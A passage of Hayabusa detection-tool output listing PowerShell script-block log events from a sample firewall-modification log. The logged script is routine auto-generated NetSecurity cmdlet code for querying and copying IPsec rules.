[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters 
$__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) 
$__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contai",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ns $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) 
$__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; 
ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters,",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"ns $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) 
{ $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) 
$__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains 